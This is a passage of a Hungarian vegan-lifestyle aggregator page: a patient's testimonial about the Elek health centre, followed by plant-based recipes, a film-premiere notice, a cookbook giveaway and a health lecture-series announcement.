erőt venni magamon, hogy gyalog elinduljak, mikor mehettem volna busszal is. Az első hónapokban tényleg nagyon nehéz volt, de idővel szokássá vált, és meghatározta életvitelemet, napjaimat. Boldogságot is adott. 10 féle gyógyszert szedtem, amikor Elekre megérkeztem 2010 szeptemberében. Turnus végén, Elekről eljövet, már csak két gyógyszer maradt meg az életemben. Ez a két gyógyszer közül az egyik - vérsűrűség hígító - mivel agyi infarktusom volt, és az alvászavarra kapott gyógyszer a másik. Emellett a belgyógyász által felírt gyógyszereket, mint például a cukorbetegségére kapott metforált is teljesen sikerült elhagynom még az eleki tartózkodásom alatt. Pedig nem folytattam speciális - cukorbeteg diétát. Egyszerűen csak a new start életvezetést éltem, jobban mondva kezdtem el megélni. Mindenre kíváncsi voltam. Leírtam a cukorbetegek speciális diétáját és haza érkezve ezt folytattam 4 hétig. A diétát néhány napos böjttel indítottam. De egy-két nap is elég lett volna. Azonban belül is éreztem, szükségem van erre. Eleken az eltöltött egy hét alatt 2-3 kg-t fogytam. Mindez annak volt köszönhető, hogy a vacsorákat teljesen kiiktattam életemből. A sok séta is közre játszott és természetesen a nyers ételek, valamint az őrölt lenmag rendszeres székletet biztosított. Annak ellenére, hogy bőséges reggeliben és ebédben volt részem minden nap, mégis az életmód változtatás már egy hét alatt 2-3 kg-val kevesebb súlyt eredményezett. Azzal a jó tanáccsal indítottak még útnak az egy hetes turnus végén, hogy fogynom is kell még. A tanácsokat - elhatároztam - be fogom tartani. Éreztem a jó Istentől kapott erőt is, és így időközben megfordultak azok a dolgok, amik a lelki halál állapotához vezettek. Az alatt a 4 hét alatt, amíg a javasolt ,,cukorbetegek számára ajánlott diétát folytattam, 5 kg-val lettem kevesebb. Attól kezdve szépen lassan kéthavonta 1 kg-tól sikerül megszabadulnom. Legutóbb 76 kg voltam Eleken (legelső alkalommal 98kg!!). Az ideális testsúlyt szeretném elérni, azt megtartani, és tudom, a szokásommá vált új életmóddal sikerülni is fog. (Kitűzött cél a 68-70 kg.) Az utolsó gyógyszert idén februárban (2012) sikerült letennem. Pszichiátrián is megbeszéltük, hogy elhagyom a gyógyszert. Nem egyik napról a másikra történt ez, hanem az adag folyamatos csökkentésével. Természetesen mindkét utolsó gyógyszer, éppúgy, mint a többi 8 tabletta elhagyását orvosi konzultáció előzte meg. Isten segítsége mellett az életmód változtatásának köszönhettem, hogy eljutottam idáig. Jelenleg elmúltam 60 éves, felmenőim mind cukorbetegség következményei miatt hunytak el, súlyos betegségekben, és bár nálam is kialakult, mégis sikerült legyőznöm speciális diétával, mozgással, a 8 alapelv életszokássá alakításával. Laboreredményeim ezt követően teljesen jók lettek. Az ott (Eleken) megszületett hála azóta is élni tanít és segít mind a mai napig. A testi-lelki harmónia, amit ebben a közösségben egyszerű kis módszerekkel megélhettem, továbblendített napról napra az élet nehézségein. Kérdésemre, hogyan lett kezelő az Eleki Egészségközpontban, az alábbi választ adta: ,,Először is nagyon tetszett a légkör, amit megtapasztaltam már az első nap Elekre érkezve. Annyira más volt a közeg, mint az elmúlt 20 év túlpörgetett munkája. Amíg betegként először ellenszenvvel mentem oda, második, harmadik napra teljesen megváltozott a beállítódásom. Jól esett együttműködni és azt csinálni, amit ott előírtak az egészségem érdekében. Végére azt vettem észre, mintha nem történt volna velem semmi, de mégis megváltozott bennem minden. A harmónia, rend, belső és külső szervezettség a hatalmába kerített. Minden elkezdett bennem jól működni. Más táplálkozás, a mozgás, a lelki dolgok hatása által apránként oda jutottam, hogy jól vagyok, megbékéltem a világgal. Ezt csodás, nagy változásnak éreztem magamban. Ha ez velem megtörténhet, akkor szeretném, ha én is ebben más számára segítség lehetnék. Szeretném, ha más is átélhetne hasonló jót. Óvatosan, semmit nem remélve megkérdeztem, hogy kaphatnék-e esélyt a kezelői feladatok végzésére. A központ vezetője és orvosa is örömmel fogadta ajánlkozásomat. Ezt követően átestem egy oktatáson (2 hét) majd valaki mellé beosztottak tanulni, mint ,,másodkezelő. Ezután már gyakorlatban szereztem a tapasztalatokat. Végül önállóan kezdtem meg a következő turnuson a kezelést. Turnusról turnusra egyre jobb sikereket éltem át. Megszerettem azokat, akiket kezelhettem. A megváltozott életmóddal hatalmasat lehet segíteni, nem csak a magam életében tapasztalom már meg. Azóta is kapcsolatban vagyunk a kezelt vendégekkel, a kialakult bizalom mai napig megvan. Jó érzés így segíteni. Most ugyanúgy tudok gondoskodni, mint 20 éven át, csak nem gyerekekről, hanem gyógyulni vágyó vendégekről. Öröm és kihívás számomra, hogy minden mozdulatra, rezdülésre oda kell figyelni, és meg kell találni, hol az a távolság, ami megfelelő köztem és a kezelt ember között. Volt, aki igényelte, hogy reggeltől estig vele legyek, más pedig függetlenebb életet próbál(t) ott élni. Egyre jobban gyönyörködöm a módszerekben. Ahogy a jó Isten adta a gyógymódokat, egymásra épülve, megteremtve azok gyógyító erejét. Szemünk láttára omlik össze az egészségügy napjainkban. Egy ilyen egészségközpont által azonban megnyílik egy olcsóbb, egyszerűbb lehetőség a gyógyulásra, az otthon is használható gyógymódok elsajátítására. Ámulok a bölcsességen, hogy ebben munkálkodni tudok. Egyre erősödik bennem a felismerés, hogy ez az, amit mindenki megpróbálhat, ártani nem fog. Ez az életmód változtatás sokkal egyszerűbbé teszi az életet. Apró csodák, amikben mindenkinek része lehet, csak rá kell szánnunk magunkat. Úgy mentem Elekre, hogy ártani nem fog, bár kicsit ellenszenves volt mindenki a személyzet közül. Nem tudtam elhinni, hogy létezik ilyen szeretetteljes közeg, de két-három nap múlva, már éreztem, hogy nálam is működik, ekkor megváltozott a véleményem. Szeretném, ha ezt mindenki megtapasztalhatná, hogy lehet jobban is élni. Nem drágábban, jobban, egészségesebben.
Banános földimogyoróvajas jégkrém
2012. július 20. Zizi kalandjai
Szerdán a délutáni szundiból ébredve beugrott a banán-földimogyoróvaj-kakaó édes hármasa. Nem tudom hogyan, és azt se, hogy miért erre ébredtem, de tudtam, hogy cselekednem kell. :) Volt három darab nagyon érett (már bebarnult héjú) banánunk a hűtőben (nyáron érdemes a már túlérett banánokat berakni a hűtőbe, így tovább elállnak és kiváló fagylalt alapanyagunk lesz belőle). Kettőt gyorsan bedobtam a robotgépbe, a többi alapanyagot találomra kimértem, hozzáadtam a banánhoz és bekapcsoltam a gépet. Néhány perc múlva valami nagyon finom nyalánkságot kaptam. Ehetjük egyből, vagy egy kicsit behűtve, majd poharakban tálalva és pirított földimogyoróval megszórva. Én azonban formába öntöttem és lefagyasztottam. Így lett egy krémes, egyszerű, cukormentes, vegán jégkrémünk vacsora utánra. (Földimogyoróvajat készíthetünk mi magunk is otthon, íme egy recept hozzá.) Krémként baba desszertnek is el tudom képzelni vagy váratlanul beugró vendégeknek is tálalhatjuk. Csodás hétvégét mindenkinek! Banános földimogyoróvajas jégkrém Hozzávalók 4 db jégkrémhez: - 2 db érett banán, hámozva, felkarikázva - 80 g földimogyoróvaj - 80 ml zabtej - 2 evőkanál kakaó Tegyük a robotgépbe az összes hozzávalót és pürésítsük simára. Öntsük a krémet formákba, helyezzünk mindegyikbe pálcikát és tegyük a mélyhűtőbe legalább 2 órára, amíg megszilárdulnak. Egyértelmű a jégkrém mánia a blogomon, ugye? :)
Hűsítő mentás céklalé
Már alakul az új cékla, de ez még egy jól megtermett tavalyi példányból készült Hozzávalók: 1-2 cékla 1 mentaág A céklát meghámozzuk és felszeleteljük: Majd átengedjük a présgépen a mentaággal együtt Végül felöntjük forrásvízzel, poharakba töltjük, és lassan elkortyolgatjuk Nagyon finom reggeli ital ? Mint tudjuk, a cékla, a magyar aloe vera ? A cékla [...]
Hungary Goes Raw
Elindult a Hungary Goes Raw facebook oldal - nyers vegán ételek, hírek, események Magyarországon, együtt! :) Köszönöm, ha megosztod a hírt másokkal is. http://www.facebook.com/HungaryGoesRaw
Mentás cukkini ragu
2012. június 24. Fittanyuka Blog
Ezt a nyári, tejszínes cukkini ragut, frissítő mentával bolondítottam meg. Kifejezetten kedvenc most a sárga cukkini, még a kinézete is csupa nyár:)! Feltétként csíkokra vágott, sült szejtánt adtam hozzá. Hozzávalók: 2 db közepes cukkini 250 ml rizstejszín 2 evőkanál kukorica keményítő 1/2 citrom leve 2 cikk fokhagyma 2 evőkanál kókusz olaj 1/2 kk himalaya só késhegynyi örőlt zöld bors friss menta A cukkiniket karikára vágjuk, megsózzuk és a kókusz olajon 3-4 percig puhítjuk. A cél, hogy roppanós maradjon! Ujjnyi vizet öntünk hozzá. A tejszínt csomómentesre elkeverjük a keményítővel, citromlével és hozzáadjuk a cukkinihez. Állandó keverés mellett besűrítjük, ízesítjük a préselt fokhagymával, örőlt zöld borssal. A menta leveleket felaprítjuk és megszórjuk vele a már elkészült ragut. Fittanyuka
Zabfasírt
Ezt még néhány héttel ezelőtt készítettem, és a fényképeim között szemlélődve láttam, hogy jéé, ezt a receptet még nem osztottam meg Veletek. Most, hogy ilyen meleg van, nem kívánom az olajban sült dolgokat. Szinte egész nap turmixozok, nagyon jól esik. Ezt a fasírtot hagyományos magyaros ízesítésben készítettem el. Hozzávalók: házi zabtejből megmaradt zabrost, fokhagyma, himalaya [...]
Szuper reggeli: Mandulavajas pirítós mandulatejes kávéval
2012. június 4. Zizi kalandjai
Le sem tagadom... mandula lázban égünk. Amióta megtaláltuk a biopiacon Zabodál Imre mandula termékeit, rá vagyunk kattanva. Először a mandulatejjel ismerkedtünk meg. Korábban már vásároltam külföldi mandulatejet, amelyik teljesen fehér színű, de Imréék teje drapp színű, mert ők a mandula héját is felhasználják a tej készítésekor. Kinyitod az üveget és erősen megcsap a marcipán illat. A tej sűrűbb, mint a külföldi változat és krémesebb is. Örülök, hogy van ilyen minőségű magyar termék a piacon. Tudom, a mandulatejet én is meg tudnám csinálni, de még nem vettem rá magam. Talán hamarosan. Elkészítése egyszerű, csak mandula és víz kell hozzá. Hagyhatjuk natúran, de lehet édesíteni is. Fűszerezhetjük vaníliával, fahéjjal, de kardamommal is el tudom képzelni. Van jó néhány recept az interneten, érdemes ezek közül válogatni itt és itt. A karácsonyra vett aprító- és robotgépemmel végre tudok mandulavajat készíteni! Nagyon egyszerű. Addig kell aprítani, pörgetni a mandulát, amíg krémessé, kenhetővé válik (recept itt és itt). Csináltam is már, de csak kis mennyiségben, amikor egy adag kekszet sütöttem. Most vettünk ebből is egy üveggel Imrééktől, natúrat, édesítetlent. Kiváló pirítósra, kekszek, sütemények sütéséhez, de fogyaszthatjuk snackként is, mondjuk alma, körteszeleteket mártogatva benne. Nálunk most a mandulavaj veri a földimogyoróvajat. :) A recept nagyon egyszerű, igazából nem is recept, csak egy ötlet arra, hogy ilyet is lehet reggelizni. Mindenkinek a saját ízlésére bízom, hogyan ízesíti a pirítóst, milyen gyümölccsel eszi. Mi juharsziruppal locsoltuk meg, a gabonakávét pedig kókuszcukorral édesítettük. A kávé nagyon krémes, selymes állagú lett a mandulatejtől. Fantasztikus! Ezzel a reggelivel biztosan délig tart majd a lendület. :) Mandulavajas pirítós mandulatejes kávéval Hozzávalók 2 főre: Pirítóshoz: - néhány szelet teljeskiörlésű kenyér - mandulavaj - juharszirup / méz / rizsszirup / agavé szirup - friss eper, szeletekre vágva Kávéhoz: - 400 ml mandulatej - 4 teáskanál gabonakávé-keverék (árpa, rozs, cikória) - 2 teáskanál kókuszcukor vagy nádcukor Az elkészült pirítós szeleteket kenjük meg mandulavajjal, locsoljuk meg juharsziruppal és tegyünk rá eper szeleteket. A kávéhoz melegítsük fel a mandulatejet. Két-két teáskanál gabonakávét egy-egy teáskanál kókuszcukorral és egy kevés mandulatejjel keverjünk a bögrékben simára, majd öntsük fel a meleg tejjel.
Ara?itas, avagy röszti banánból
2012. május 26. Punk In The Kitchen
Ara?itas, avagy röszti banánból A bevándorlók boltjában vettem két szép főzőbanánt, bár még nem tudtam, mit kezdek velük. Magyar receptet szinte egyáltalán nem találtam sütőbanán kulcsszóval, szóval a nemzetközi platano és plantain szavakra kerestem. Mint most kiderült, főzőbanán a neve, nem sütőbanán, így már van pár találat. Kis keresés után az ara?itas mellett döntöttünk, ez lényegében azonos a magyar rösztivel, csak nem krumpliból van. Pókocskákat jelent a neve, mert kilógnak a lábai sütés után. Ara?itas Hozzávalók: két szép zöld főzőbanán, avagy platano 6-8 gerezd fokhagyma só, bors olaj Idő: szánjunk rá egy órát, hallgassuk meg a Fake Shakes demót főzés közben Az elkészítés pontosan követhető ezen a szájbarágós videón, de én is leírom. A pucolás eltér a megszokottól, a banánok két végét levágtuk, majd az éleinél végig bevágtuk őket. Így leszedhető a vastag héj. Az egészet lereszeltük, majd 10 percre jó sós vízbe áztattuk. Áztatás után leszűrtük és minden vizet kinyomtunk belőle, papírtörlő használata ajánlott. Az eredményt összekevertük préselt fokhagymával, sóval, borssal, majd lapos kis pókokat készítettünk. Olajban megsütöttük, majd mártogatós csípős szósszal (paradicsom, szójaszósz, csípős szósz, só, cukor) megettük.
Csicseriborsó pástétom
Szuper eleség, ami még mindig nem nyerte el méltó helyét a konyhákban. Tapasztalatom szerint inkább csak a reform-táplálkozás hívei és a vegetáriánusok ismerik igazán a csicseriborsót, mint ételt. Pedig rendszeres fogyasztásával akár a koleszterinszintünket is normalizálja. Két fontos tulajdonsága miatt a diétázóknak is kitűnő táplálék. E két tulajdonság közül az egyik az alacsony zsírtartalom, a másik pedig a magas rost tartalom. Arról nem beszélve, hogy E vitaminban és karotinban is gazdag minden egyes csicseriborsó szem. Fontos tudni, ha nem konzervben vásároljuk meg, akkor az elkészítésére 12 órával minimum előre tervezni kell, ugyanis egy fél nap áztatás szükséges ahhoz, hogy utána puhára tudjuk főzni - akárcsak a száraz fejtett bab esetében.Ha már áztatás, nem árt tisztában lenni azzal is, hogy az áztatást követően a főzéshez új vizet használjunk (méreganyagokat tartalmazhat az első víz), sőt érdemes szűrő segítségével átmosni a borsószemeket. A recept: Hozzávalók: - 1 fej hagyma - 1 marék csicseriborsó (kb. 2,5 dl) - 3 gerezd fokhagyma - víz - ételízesítő - paprika - babérlevél Elkészítés:A 12 órán át áztatott csicseriborsót néhány szál babérlevéllel és bő vízzel közepes lángon ételízesítővel feltesszük főzni. Nekem 45 percre minimum szükségem volt ahhoz, hogy a szemek megpuhuljanak, de akár 60-70 perc főzés is kellhet.A megpuhult csicseriborsó szemeket lehűtjük, majd aprító vagy turmixgépbe tesszük. A levéből nagyon keveset teszünk hozzá, hogy könnyebben pépes legyen.Ezt követően a további fűszereket a felaprított hagymákat és paprikadarabokat rakunk bele, majd az egészet összeturmixoljuk. Ezzel kész is a finom csicseriborsó-pástétom.Aki fűszeresebb ízek kedvelője, egy kevés kis magyaros fűszerkeverékkel feldobhatja.
Fejes saláta almával
Salátát salátával... Talán ez is lehetne a mottója az elmúlt heteknek. A május tulajdonképpen a retek és a saláta szezonja, eszünk is belőle mostanság jó sokat. A fejes saláta konyhai felhasználása Magyarországon nem sokrétű, hiszen többnyire nyersen fogyasztjuk, csak néhány háziasszony készít belőle levest vagy főzeléket. Előnye, hogy nincs benne kalória, előételként is fogyaszthatjuk, de díszítésnek sem utolsó. Az alábbi recept alapján készült salátát könnyű tavaszi vacsoraként fogyasztottam. Hozzávalók: 1 fej saláta 2 szál sárgarépa 2 db zöldalma Méz Ecet Só Olívaolaj Bors - A salátát jó alaposan mossuk meg és csepegtessük le. Az almát és a sárgarépát tisztítsuk meg és szeljük/reszeljük megfelelő méretűre. - 1 evőkanál ecetből és olívaolajból, valamint ízlésszerinti só, bors és méz keverékéből készítsünk öntetet. - Keverjük össze egy nagy tálban a hozzávalókat, majd egy órán át érleljük hűtőben. - Fogyasszuk egészséggel! Ildi :-)
Az utolsó fogás - magyarországi filmpremier
Monday, May 21, 2012 6:00pm until 9:00pm Francia Intézet -> 1011 Budapest, Fő u. 17. Milyen hatása van a világtengerek túlhalászatának környezetünkre, élelmiszerünkre és a jövőnkre? Rupert Murray alámerült, hogy bemutassa a jeges valóságot a Föld tengereinek kifosztásáról. A Greenpeace, a Diverziti és a Francia Intézet bemutatja.... Kellemetlen igazság a világtengerek túlhalászatáról - The Economist A film előzetese: http://www.youtube.com/ watch?v=MPPRnR7YIFE A BELÉPÉS INGYENES, DE REGISZTRÁCIÓHOZ KÖTÖTT: ide írj: sage@greenpeace.hu
Szuper reggeli: Málnás mandulatej turmix
Néhány éve szokásos reggelijeink közé tartozott a pirítós és a tea. Akkor már vegetáriánus voltam, amikor egy kolléganőm mesélte, hogy ő most már csak gyümölcsöt eszik délelőtt és egyáltalán nem lesz éhes ebédig. Gondoltuk, ezt mi is kipróbáljuk, hiszen a gyümölcsök frissítenek, a gabonák táplálnak, a zöldségek pedig tisztítanak. Reggel és délelőtt szükségünk is van frissítésre, hogy gyorsan pörögjön az agyunk, igaz? Szóval maradt a tea (mindenféle ízesítés nélkül) és a gyümölcs. Aztán nagy rajongói lettünk a zöld smoothieknak. Készítettük így, meg banánnal, almával, spenóttal/leveles kellel és vízzel is. Utána jöttek a gyümölcsturmixok, smoothiek reggelire, plusz egy bögre gyógytea. Karácsonyi ajándékunk egy aprítógép volt, amihez tartozik egy gyümölcscentrifuga is, így most már zöldség/gyümölcsleveket is tudunk préselni. Kedvencünk a répa-narancs-gyömbér hármas. A munkahelyemen tízóraira mindig eszem valamilyen gyümölcsöt, meg sok-sok vizet iszom ebédig. Eleinte fura volt, meg néha éhesek voltunk, de mostanra (2-3 év után) teljesen megszokta a szervezünk ezt a fajta reggelit és bírjuk gyümölcsökkel ebédig. Kivételek persze a hétvégék, amikor a szombati piac után még benyomunk egy cappuccinot és valamilyen péksütit, vasárnap meg a ráérős reggelizős nap, így a palacsinta gyakori vendég az asztalon. Az angol nyelvben a juice és a smoothie között tesznek különbséget. A juice az, amikor a zöldségnek vagy a gyümölcsnek csak a leve van kipréselve, a gyümölcscentrifugában hagyva a növényi rostokat. Ebben a formában is bekerülnek a vitaminok és ásványi anyagok a szervezetünkbe. A smoothie pedig az, amikor a teljes zöldség vagy gyümölcs (kivéve a héjakat, pl: narancshéj, banánhéj, stb.) le van turmixolva, vízzel, teával egy kicsit hígítva úgy, hogy sűrű levet kapunk. Ilyen a zöld smoothie is. Adhatunk hozzá növényi tejet, akkor pedig krémes shake-et kapunk. Úgy gondolom, hogy a magyar turmix szó ennek a smoothie-nak és shake-nek lehet a keveréke. Ti mit gondoltok? Málnás mandulatej turmix Hozzávalók: - 500 ml mandulatej - 60 g málna (fagyasztott vagy friss) - 3 teáskanál méz A hozzávalókat tegyük a turmixgépbe, turmixoljuk 5 percig. Ha túl sűrűnek találjuk, hígítsuk még egy kevés mandulatejjel. De ha sűrűn hagyjuk, akkor joghurtként is megehetjük, csak szórjunk hozzá zabpelyhet és már kész is a komplett, teljes értékű vegán reggeli.
Vadrizs saláta babbal és avokádóval pirított szezámolajos öntettel + nyereményjáték
2012. április 25. Zizi kalandjai
Amikor elindítottam ezt a blogot még nem tudtam mi lesz belőle. Aztán elkezdett alakulni, testet ölteni és mára a gyermekem lett. Hazugság lenne, ha azt mondanám, a blogot csak magamnak írom, hogy a receptek egy helyre legyenek gyűjtve. Szuper, hogy rendezetten megtalálok mindent egy helyen (+ még a Moleskine receptes naplómban, ami már olyan kövér a kinyomtatott vagy újságokból kivágott receptektől, hogy alig lehet becsukni :)). Ez a blog tehát neked és nektek is szól. Egy fejlődési folyamatot kísérhettek végig, ahol nem az A-ból B-be való eljutás a cél, hanem az út, amelyen haladok és kalandozok. Köszönöm mindenkinek, aki járt már nálam és visszajár vagy ezután fog még csak ide tévedni. Néhány hete már kihirdettem a Facebook oldalon, hogy hurrá, éljen, elértük a bűvös 1000 fős tábort, szóval hamarosan nyereményjátékot hirdetek. Végre itt a játék. A nyeremény pedig - szerintem - nagyon szuper... én legalábbis nagyon örülnék ennek a szakácskönyvnek, ugyanis nekem még nincsen meg! :) Ezek szerint szakácskönyvet lehet nyerni? IGEN! Melyiket? - kérdezitek, ugye? Hááááát... ezt! Havas Dórát, alias Lila Fügét már ismerem egy ideje. Nagyon szeretem a blogját, mert néha igazi gyöngyszemekre bukkanok nála. A szakácskönyve letisztult, könnyen olvasható, átlátható, csodás képekkel és finom receptekkel (még a vegák is találnak maguknak benne sok-sok újdonságot!). Szóval azt gondoltam, hogy ezt a könyvet sorsolom ki.* Hogy mit kell érte tenni? Írjátok meg nekem ide kommentben, hogy miért szerettek a blogomra látogatni, melyik a kedvenc receptetek vagy milyen recepteket szeretnétek látni még a blogon? Aki növelni szeretné az esélyét a nyereményre, megteheti még a következőket: 1. Lájkolod Zizi kalandjait a Facebookon.** 2. Facebook oldalamon (ahol ez a blogbejegyzés megjelenik) megosztod a nyereményjátékot. 3. Követed Zizi kalandjait a Twitteren.** 4. Megosztod a nyereményjáték hírét Twitteren, kiteszed az alábbi mondatot az üzenőfaladra: Lila Füge szakácskönyvet nyerhetsz @ziziadventures nyereményjátékán. Info: http://bit.ly/JEczZB. #nyereményjáték 5. Követed Zizi kalandjait a Pinteresten.** Tehát, ha minden lépést megtesztek, hatszoros eséllyel indultok a nyereményért! :) * A nyereményjáték saját befektetés, nem a könyv szerzője és nem is a kiadója szponzorálja! **NE FELEJTSÉTEK EL: bármelyik lépést is teszitek meg, mindegyikről írjatok egy külön kommentet ide, hogy követni tudjam ki mit csinált! Ha már korábban lájkoltad a Zizi kalandjait Facebookon, meg már követsz egy ideje Twitteren vagy Pinteresten, erről is adjál hírt itt, mert csak így tudom összeállítani a nyereményért indulok névsorát. A játék 2012. április 25-én kezdődik és május 6-ig várom a kommenteket. A nyereményt személyesen lehet majd átvenni Budapesten vagy tudom postázni is, de csak magyarországi címre. És akkor a recept... ez inkább télfelejtő, tavaszváró recept. Első alkalommal leveleskellel készítettem el, második alkalommal már spenóttal. Került bele vadrizs és barnarizs keveréke, fehérjében gazdag bab, valamint tápláló, sok proteint és olajat tartalmazó avokádó. Az eredmény egy tál meleg, tápláló, vitamindús, laktató saláta. Nem érdemes kihagyni! Vadrizs saláta babbal és avokádóval pirított szezámolajos öntettel Hozzávalók 2 főre: Salátához : - 1/2 csésze főtt vad/barnarizs - 6-7 nagy levél leveleskel vagy 300 g spenót vagy mángold, felaprítva - 1 avokádó, kimagozva, felkockázva - 1/2 csésze bab, beáztatva éjszakára, leöblítve és megfőzve - 2-3 gerezd fokhagyma, felaprítva - kókuszolaj vagy olívaolaj - só, bors Öntethez : - 3 evőkanál pirított szezámolaj - 1 evőkanál rizsecet vagy almaecet - 1 evőkanál szójaszósz - 1/2 citrom, leve - bors Külön külön lábasban főzzük meg a rizst és a babot (kb. 1,5 óra kell a rizsnek és a babnak is). Közben készítsük el az öntetet: a hozzávalókat keverjük jól el egy tálban és tegyük félre. Készítsük el a zöldségeket. A zöldek mehetnek a salátába nyersen is, de egy 1 evőkanál kókuszolajon vagy olívaolajon és 2-3 gerezd fokhagymán, kevés sóval és borssal megpárolhatjuk kb. 10 perc alatt. Öntsük egy nagy tálba a megfőtt rizst, babot, a leveleskelt, az avokádót és öntsük le az öntettel.
Magyaros napraforgó pástétom
2012. április 24. Mindennapi ételeink
Gyors, egészséges, finom pástétom, finom napraforgómaggal. :-) Hozzávalók: 20 dkg darált napraforgómag 1 fej vöröshagyma 1 szál újhagyma kevés petrezselyemzöld 1/2 ek. extra szűz olívaolaj 2 ek. zsemlemorzsa 0,5 dl víz 1 db főtt répa 2 gerezd fokhagyma pirospaprika, só, köménymag Elkészítés: A blogon igen kedvelt vegán májpástétom mintájára készült ez a pástétom. Kevés vízen az apróra vágott vöröshagymát megpároltam. Ehhez szórtam 1 zsemlemorzsát, darált napraforgómagot, pirospaprikát, sót és köménymagot. Amikor ezek jól összepirultak, felengedtem vízzel, olajat locsoltam hozzá. Ekkor tettem hozzá a főtt és turmixolt répát, ill. apróra vágott újhagymát, fokhagymát, és kevés friss petrezselyemzöldet. Összefőztem és frissen, répasalátával fogyasztottuk.
A vegetáriánus gyermeknevelés nehézségei
Mindegy, hogy a vegetáriánus szülők milyen megfontolásból nem esznek húst, azt egyszer csak el kell dönteniük, hogy gyermekeiket is így nevelik-e majd. Hogyan magyarázzák majd el csemetéjüknek, hogy miért ne egyenek húst?
Babbal töltött krumpli (vegán)
2012. március 27. Dulmina tündérkonyhája
Nem hoznak különösebben lázba a gasztroújságok, de most győzött a kíváncsiság, megvettem a magyar GoodFood első számát. S ha már megvettem, átböngésztem, és végül természetesen főztem is belőle. Persze hű maradtam önmagamhoz, elég nagyjából tartottam csak be a kiinduló receptet, de a Főkóstoló is egyetértett, hogy ez egyáltalán nem vált kárára, sőt! Hozzávalók 4 személyre 1 bögre (2,5 dl, 25
A HÁZI GYÓGYMÓDOK ALKALMAZÁSÁNAK ALAPELVEI ÉS GYAKORLATA
2012. márc. 20., kedd, 18 óra SOTE (TF) díszterme (Alkotás u. 44.) A HÁZI GYÓGYMÓDOK ALKALMAZÁSÁNAK ALAPELVEI ÉS GYAKORLATA Betegségmegelőzés és gyógyítás egyszerű, hatékony eszközökkel és terápiákkal (angol nyelvű előadás, magyar tolmáccsal) Előadó: dr. Wynn Horstley orvos USA Szeretettel meghívjuk Önt és barátait táplálkozástudományi és életmód-előadásainkra: NEM TITOK AZ EGÉSZSÉG - 2012/1. Az előadásokat kéthetente keddenként, 18 órai kezdettel, SOTE Testnevelési és Sporttudományi Kar (TF) dísztermében tartjuk (1123 Budapest, Alkotás u. 44.) Március 20. A házi gyógymódok alkalmazásának alapelvei és gyakorlata Betegségmegelőzés és gyógyítás egyszerű, hatékony eszközökkel és terápiákkal (angol nyelvű előadás, magyar tolmáccsal) Április 3. Ha az epe bajban van Az epe működésének alapjai, összetétele, az epekőbetegség háttere és étrendi kezelése. Természetes epevédelem, a kímélő étrend szabályai Április 17. A gyógyszeripar árnyoldalai - egy volt orvoslátogató szemével. Hírek és titkok a kulisszák mögül. Betegek a ,,futószalagon Május 15. A gyógyító napfény Újabb tudományos eredmények a napfény előnyös hatásairól. A napfényterápia alapjai Május 29. Konyhaművészet otthon - mit, hogyan, miért? A főzés, párolás, pirítás, olajban és roston sütés, grillezés, mikrohullámú kezelés, hűtés, mélyhűtés, szárítás és egyéb műveletek jellemzése egészségvédelmi szempontból Előadók: Tóth Gábor okl. élelmiszer-ipari mérnök, Szabó Attila tanár, egészségnevelő, dr. Wynn Horstley orvos, USA, dr. Lukács Tamás orvos Mindenkit szeretettel várunk! Az előadások után beszélgetést tartunk o Terembérleti hozzájárulásként 250 Ft-ot elfogadunk További információk: 06/30-221-9355 (Pásztor Katalin) A sorozatot szervezi és támogatja: Oltalom Alapítvány, Életpont Nonprofit Kft., Új Életmód egészségmagazin www.eletadotv.hu o www.ujeletmod.hu o www.sola.hu
Zöldséges batyu
Január elején én is fogyókúrába kezdtem...:-) Hát ja, mióta a gyerekek mindketten ovisok, én pedig dolgozni kezdtem, sokszor csak a szendvics, kenyér, félkész kaja verziója maradt.. És ennek persze meglett az eredménye... A Kismama Magazin és a babaszoba.hu közösen indított egy 5 hetes virtuálisan követhető fogyókúrát, amiben többféle menü között lehetett választani, kifejezetten a családnak is főző, kevés idővel rendelkező kisgyerekes anyukáknak, mindig megjelölve, hogy a baba mit ehet meg belőle! (a menüket már levették a netről, majd nyáron lesz legközelebb megint!). Három féle menüből lehetett választani: szoptatós, magyaros éééés vegetáriánus! Én természetesen utóbbit választottam, és bár alapból tej- és tojástartalmú vega étrend volt, igyekeztem a legtöbb helyen a vegán helyettesítéseket alkalmazni. Nagyon változatos, sok finom ötletben bővelkedő menü. Hozzászoktam a kevesebb szénhidráthoz, ismét a sok nyers zöldséghez, gyümölcshöz, újból a minimális édesítéshez. Az 5 hét elteltével újrakezdtem a diétát (-4 kg eddig, de van még 3 kg, amit le kellene dobni...) , és ma ez volt az ebédem. Tök egyszerű, de nagyon finom!:-) Így diétásan elment ebédre, amúgy vacsorára javallanám.:-) Ez a szép színes összeállítás pedig a reggelim volt egyik nap:-) Zöldséges batyu Hozzávalók (4 db batyuhoz): 2 db készen kapható teljes kiőrlésű réteslap (Tante Fanny) 1 édesköménygumó 1 fej hagyma 2 nagyobb sárgarépa 1 cukkini 2 fehérrépa 2-3 ek. borsó só őrölt gyömbér 1 ek. olívaolaj Az olajon megpirítjuk a fleaprított hagymát és a kis darabokra vágott édesköményt. Rászórjuk a durvára reszelt cukkinit, együtt pirítjuk kicsit, majd bele a többi aprított zöldség. Megfűszerezzük, és fedő alatt puhára pároljuk. Kihűlés után kezdjük el tölteni a batyukat. Egymásra terítjük a két réteslapot és ollóval egyenlő méretű négyzeteket vágunk ki. Középre halmozzuk a zöldséget, óvatosan ráhajtogatjuk a tésztát. Bekenjük a tetejét kis olajjal és 200 fokon kb. 20-25 perc alatt megsütjük. Vigyázat, gyorsan megéghet a teteje!
Paradicsomszószban sült tojás, azaz shakshuka
2012. január 17. Zizi kalandjai
Nagyon ritkán eszem tojást - többnyire csak süteménybe belesütve -, de néha megkívánom és akkor valamilyen formában elkészítem. Ez ez egyszerű paradicsomszószban sült tojásnak indult, de Hínyenc felhívta rá a figyelmemet, hogy akár shakshuka is lehetne. Bevallom őszintén először nem tudtam miről beszél, így utánajártam egy kicsit a témának. A shakshuka közel-keleti étel, származását tekintve lehet izraeli vagy tunéziai vagy algériai. Líbiában tradicionális reggelinek számít. Magyarul pedig buggyantott vagy posírozott tojás paradicsomszószban, chilivel, hagymával, fűszerekkel összesütve. Mindenkinek a fantáziájára bízom, hogy mit tesz bele. Én cukkinivel és kakukkfűvel dobtam fel. Aztán megmutattam öcsémnek az ételről készült Instagramra feltöltött fotót. Annyira nyálcsorgatóra sikerült a kép, hogy öcsém - aki elég ritkán főz, de akkor jól - elhatározta, hogy megcsinálja. Ő még babot is tett bele. Lehet egy kiadós hétvégi reggeli, de akár egy könnyű ebéd is. Mi pirítóssal ettük, de el 